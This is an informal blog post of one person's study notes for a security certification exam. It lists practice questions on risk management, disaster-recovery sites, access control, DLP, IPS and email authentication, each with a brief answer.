This article is literally just copy-pasted from my own notes, please feel free to browse for now but this will be edited soon.
DRP = Disaster Recovery Plan
Port scans = Active recon
If username being changed but password same, it’s password spraying
An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the following would be most relevant for the analyst to evaluate?
SUBJECT ROLE
A company needs to provide administrative access to internal resources while minimizing the traffic allowed through the security boundary. Which of the following methods is most secure?
BASTION HOST
A bastion host is a highly secured server located on a perimeter network (also known as a DMZ) that is designed to withstand attacks
A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee’s corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation. Which of the following logs should the analyst use as a data source?
ENDPOINT
because employee laptop is an endpoint..
A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?
TRANSFER
Transferring risk to insurance provider
Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?
RISK REGISTER
Like a registry of risks lol
Which of the following should a security administrator adhere to when setting up a new set of firewall rules?
CHANGE MANAGEMENT PROCEDURE
A client asked a security company to provide a document outlining the project, the cost, and the completion time frame. Which of the following documents should the company provide to the client?
SOW statement of work
Input validation for XSS vulns
A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?
change control request
Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?
Audit Findings
keyword is internal. if it was external then fines.
An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?
WARM SITES
Warm Sites
● Not fully equipped, but fundamentals in place
● Can be up and running within a few days
● Cheaper than hot sites but with a slight delay
Cold Sites
● Fewer facilities than warm sites
● May be just an empty building, ready in 1-2 months ● Cost-effective but adds more recovery time
A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?
Sensitive
Which of the following allows for the attribution of messages to individuals?
Non-Repudiation
Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?
Automation
Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?
DLP
Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?
Compensating Control
A systems administrator is looking for a low-cost application-hosting solution that is cloud-based. Which of the following meets these requirements?
Serverless Framework
ARO = annualized rate of occurence
A security administrator needs a method to secure data in an environment that includes some form of checks so track any changes. Which of the following should the administrator set up to achieve this goal?
FIM file integrity monitoring
A security engineer is implementing FDE for all laptops in an organization. Which of the following are the most important for the engineer to consider as part of the planning process? (Choose two.)
A. Key escrow B. TPM presence
Key escrow: This is important to ensure that encryption keys can be recovered in case they are lost or forgotten. It is a crucial consideration for Full Disk Encryption (FDE) to maintain access to data even if issues arise with the primary encryption keys. - TPM presence: Trusted Platform Module (TPM) is a hardware-based security feature that can store encryption keys securely. Ensuring the presence of TPM on laptops enhances the security of FDE by protecting the encryption keys from being accessed or tampered with.
A security analyst scans a company’s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?
Setting up a VPN and placing the jump server inside the firewall
An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?
IPS
IPS (Intrusion Prevention System): Monitors and controls network and system activities to protect against malicious activities by detecting and preventing attacks in real-time. An IPS can block traffic that matches known attack signatures.
A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider. Which of the following is a risk in the new system?
Supply Chain Vendor
Which of the following is used to validate a certificate when it is presented to a user?
OCSP
A security consultant needs secure, remote access to a client environment. Which of the following should the security consultant most likely use to gain access?
IPSec
Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?
Infrastructure as code
Which of the following practices would be best to prevent an insider from introducing malicious code into a company’s development process?
Peer review and approval
Earthquake prone areas data loss
off-site replication
legacy IOT devices access vulnerability
Segmentation
after audit , confidential data, restrict access quickly
Access control lists
classified storage array, what should company request from vendor?
Certification
An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?
Segmentation
Which of the following is the most common data loss path for an air-gapped network?
Removable devices
An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?
Deploying a SASE solution to remote employees
EMAIL ORIGINATION AUTHORIZATION
DMARC
Existing credentials from third party site is NOT SSO its federation
Memorandum of Agreement (MOA): An MOA is a document written between parties to cooperatively work together on an agreed upon project or meet an agreed upon objective.